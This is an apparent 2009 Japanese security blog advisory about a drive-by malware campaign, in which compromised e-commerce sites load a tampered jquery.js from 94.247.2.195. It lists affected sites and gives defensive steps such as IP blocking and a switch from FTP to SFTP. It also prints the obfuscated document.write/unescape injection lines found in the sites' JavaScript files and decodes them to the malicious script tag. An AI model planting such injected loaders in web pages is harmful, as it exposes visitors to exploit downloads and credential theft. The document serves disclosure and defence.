UnderForge of Lack

緊急

このウィルスを何と呼ぶべきなのかよくわかりませんが、とりあえず zlkon-virusとでもよんでおきましょう。

昨日はPC通販サイトがヤラれていましたが、更に汚染サイトが増えています。

ウィルスベンダー各社はまだ何も反応してない様子なのですが、AJaxを使ったいくつかのE-commerceサイトで、jQuery.jsの呼び出し先が改竄され、悪意を持ったサイトへの誘導になっています。

誘導先は

94.247.2.195/jquery.js

で、このライブラリをロードすると、以下のURLリクエストが発生します。

hxxp://94.247.2.195/news/?id=100

この呼び出しは UA（ユーザエージェント）によって幾つかのリダイレクトを行い、

hxxp://94.247.2.195/news/?id=2
hxxp://94.247.2.195/news/?id=3

の形でバイナリファイルをテンポラリ領域にダウンロードしようと試みます。

id=2 は PDFが
id=3 は swf(Flash)がダウンロードされるようです。

Flashファイルは実行されると、a null exception でクラッシュし、そのスタックオーバーフローを利用してリモートコードを実行させようと更に幾つかのMalice Fileがダウンロードされてしまいます。

----------------
未確認ですが、このトロイに感染した状態で ftpを使用するとユーザとパスワード情報を抜かれ、感染元のサイトに転送されてしまう恐れがあるそうです。（実際のコードは不明）

自分のサーバソリューションの堅牢性に自信のないユーザは、ftpを使用せず、SSH ないし、SFTPを使用するようにしてください。

----------------
現在陥落中のサイト（94.247.2.195への呼び出しがあるサイト）：
2009.04.06 AM8:00時点・未修正

hxxp://www.geno-web.jp/

www.geno.co.jp/4D

anketo_form.js
document.write(unescape('ln%3ChyAshyAcripay1t%20n2sr2qc%3D%2F%2F9hyA4%2E2ln47%2E2%2E192q5%2Fj2qq87eueay1r9Qly%2Ejs%3EhyA%3C87e%2F9Qlscay1ray1ihyApn2t%3E').replace(/di|2q|hyA|87e|n2|ay1|9Ql|ln/g,""));
25

banner_koukoku.js
document.write(unescape('ln%3ChyAshyAcripay1t%20n2sr2qc%3D%2F%2F9hyA4%2E2ln47%2E2%2E192q5%2Fj2qq87eueay1r9Qly%2Ejs%3EhyA%3C87e%2F9Qlscay1ray1ihyApn2t%3E').replace(/di|2q|hyA|87e|n2|ay1|9Ql|ln/g,""));
13

現在は「臨時メンテナンス」として閉鎖中です※ウィルス感染云々の記述はありません。


----------------
hxxp://www.ken-on.co.jp/k-shop/2009/03/post_67.html

1行削除
hxxp://www.juicyrock.co.jp/mj/

www.juicyrock.co.jp/mj/
script.js
document.write(unescape('ytK%3Csc7xGripytKtoG5%20soG5rcytK%3D%2F%2F9ytK4hc%2E247%2E2652%2E12659Vz857xG%2F7xGj265queroG5y%2EytKjq3s%3E%3C%2FhcscytKrytKipq3toG5%3E').replace(/Vz8|oG5|q3|265|hc|ytK|7xG/g,""));
26

----------------
エスケープコードによる難読化を図っていますネ

%253Cscript%2520src%253D%252F%252F9%204%252E247%252E2%252E195%252Fjquery%252Ejs%253E%253C%252Fscript%25%203E
は
<script src=94.247.2.195/jquery.js></script>
になります。

----------------
今後、どんどん増える可能性があります。

IDS/IPS 管理者の方へ
BLOCK IP: 94.247.2.0 - 94.247.3.255

Browserの制限サイトへ追加
94.247.2.* (ワイルドカード可能ならば)
94.247.3.*
zlKon.lv

firefoxユーザへ
No Scriptの導入を

Webパブリッシャーの方へ
FTPの使用中止、SSH/SFTPに変更

----------------
参考：
js script - for Juliet

This entry was posted on 月曜日, 4 月 6th, 2009 at 8:39 AM and is filed under RiskHedge, security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.